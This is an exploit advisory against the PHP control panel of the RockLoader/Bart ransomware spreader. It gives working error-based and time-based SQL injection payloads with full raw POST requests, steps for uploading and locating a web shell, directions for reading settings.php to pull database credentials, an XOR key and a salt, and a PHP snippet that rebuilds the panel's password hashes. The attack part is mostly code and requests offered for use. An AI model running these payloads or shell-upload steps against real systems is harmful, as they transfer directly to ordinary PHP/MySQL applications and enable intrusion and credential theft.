RockLoader SQL Injection / Shell Upload

`# Exploit Title: RockLoader aka Bart Malware [SQLi] and shell file   
upload  
# Date: 27-06-2016  
# Software Link Leak: https://github.com/colocation/RockLoader-source  
# Exploit Author: Danail Velev  
# Contact: ICQ: 209030 / [email protected]  
# Website: http://colocation.bg/  
# Category: webapps / malware / private software / infection spreader /   
C&C  
# Inspiration: http://www.xylibox.com/  
  
1. Description  
  
Since last days ... new Bart aka RockLoader malware/rasomware spreader   
is active.  
My family was a victim of this type of extortion past year.  
  
2. Short info: SQL Injections  
  
NO user registration required.  
The Command and Control Server processing the spread requests,user   
tasks and responsible for the process, is suffering from mutiple remote   
sql injection.  
Common C&C server path is "/cp/login/" in most common setups.  
Since the specific of the spreader and it's functionality, methods of   
encryption and working process,  
There is possibility for RCE,MSF/CMD injection and local root post   
explotation.  
  
In common cases the setup comes with this specific configs.  
- user has full priviligies to host sql server.  
- you can interact with local file read in most conditions.  
- user is database administrator in most conditions.  
- database name and structure are identical since it comes as   
phpmyadmin dump.  
- file write and read is a must.  
- user screen capture plugin on advanced setups.  
- default database name is 'appdater'  
  
  
3. Proof of Concept:  
  
Affected parameters are "username" and "password" via specifict POST   
request.  
The 3th parameter is the php session.  
  
----=(SQL Injection 1)=----  
Type: error-based  
Method: POST  
Request Type: XMLHttpRequest  
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP   
BY clause (FLOOR)  
Payload example for POST parameter username:   
password=S0M3PaSSw0rd&username=-1' OR 32 AND ROW(9213,8915)>(SELECT   
COUNT(*),CONCAT(0x716a707071,(SELECT   
(ELT(9213=9213,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM (SELECT 4118   
UNION SELECT 5903 UNION SELECT 7493 UNION SELECT 1139)a GROUP BY x)--   
KSxg1=6 AND 000580=000580 --  
Example raw request for host: 127.0.0.1  
-----------------EXAMPLE--------------------  
POST /cp/login/ HTTP/1.1  
Content-Length: 87  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Referer: 127.0.0.1/cp/login/  
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190  
Host: 127.0.0.1  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21   
(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*  
password=S0M3PaSSw0rd&username=d0na1DTrump  
-----------------END--------------------  
  
=================================================================================================================================================================  
  
POC:  
----=(SQL Injection 2)=----  
Type: AND/OR time-based blind  
Method: POST  
Request Type: XMLHttpRequest  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload example for POST parameter username:   
password=S0M3PaSSw0rd&username=-1' OR 32 AND SLEEP(5)-- sWMh1=6 AND   
000580=000580 --  
Example raw request for host: 127.0.0.1  
-----------------EXAMPLE--------------------  
POST /cp/login/ HTTP/1.1  
Content-Length: 87  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Referer: 127.0.0.1/cp/login/  
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190  
Host: 127.0.0.1  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21   
(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*  
password=S0M3PaSSw0rd&username=d0na1DTrump  
-----------------END--------------------  
  
=================================================================================================================================================================  
  
POC:  
----=(Shell Upload POC)=----  
Requirements:  
- Valid user for control panel.  
- Access to database for reading.  
  
Step1:  
Upload your shell as new file via Control Panel.  
Name it: OWNED  
Note: filename is masked in control panel  
  
Step2:  
See 'file' table at 'appdater' database.  
QUERY: SELECT * FROM `file`;  
Look for name=OWNED and coresponding file_path name (EXAMPLE:   
C932kc.php)  
  
Step3:  
Location of your Shell  
http://127.0.0.1/files/c932kc.php  
  
-----------------END--------------------  
=================================================================================================================================================================  
POC:  
----=(Database user and password disclose)=----  
  
Example request to get the directory location:  
  
===============================================  
POST /cp/login/ HTTP/1.1  
Content-Length: 87  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Referer: 127.0.0.1/cp/login/  
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190  
Host: 127.0.0.1  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21   
(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*  
password=S0M3PaSSw0rd&username=d0na1DTrump  
===============================================  
Response if error reporting is enabled:  
  
<br />  
<b>Notice</b>: A session had already been started - ignoring   
session_start() in <b>/var/www/html/cp/login/auth.php</b> on line   
<b>23</b><br />  
  
  
===============================================  
  
Read the settings.php file of the control panel to obtain user and   
password for database.  
location: /var/www/html/cp/settings.php  
  
----Snip-----  
<?php  
//Debug  
ini_set('error_reporting', E_ALL); // REMOVE TO TURN DEBUG OFF  
ini_set('display_errors', 1); // REMOVE TO TURN DEBUG OFF  
  
//MySQL settings  
define('DB_HOSTNAME', 'localhost');  
define('DB_USERNAME', 'root');  
define('DB_PASSWORD', '');  
define('DB_DATABASE', 'appdater'); <- most of the time this is the   
default database since it's come in the bundle.  
define('DB_PORT', '3307');  
  
......  
---EndSnip---  
=================================================================================================================================================================  
POC:  
----=(XOR Encrypton key and password salt disclose)=----  
  
Read the settings.php file (/var/www/appdater/html/settings.php)  
Look at the global configuration for the app.  
  
----Snip-----  
//GLOBAL settings  
define('XOR_KEY', 'aWL~jH9zJl$5Yfz7'); <- File encryption XOR_KEY  
define('FILES_URL', 'https://summerr554fox.su/files/'); <- address of   
all uploaded files  
define('APPDATER_PATH', '/var/www/html/');  
define('SALT', 'KsqwGzTl?Qwq|oHA'); <- SALT KEY FOUND !  
?>  
---EndSnip---  
TADAAAAAAAAAAAAAAAAAAAAAAAAAa we got the password for the sql and even   
more: XOR_KEY for file encyption, EXE files location, PATH to the   
Control Panel anddd....  
The most important --> THE SALT !  
  
=================================================================================================================================================================  
POC:  
---=(Admin panel password generator)=---  
  
Read the core/functions.php file   
(/var/www/appdater/html/core/functions.php)  
Look for this  
  
---Snip-----  
function create_hash( $string ) {  
return substr( sha1( SALT . $string ), 3, 17 );  
}  
----EndSnip---  
  
TADAAAA so we got and the algo used to create correct user and   
password.  
  
  
<?php  
define('SALT', 'KsqwGzTl?Qwq|oHA');  
function create_hash( $string ) {  
return substr( sha1( SALT . $string ), 3, 17 );  
}  
echo create_hash('S0M3PaSSw0rd');  
?>  
  
=================================================================================================================================================================  
  
  
3. Solution:  
  
DO NOT WRITE BUGGY APPZ:)  
`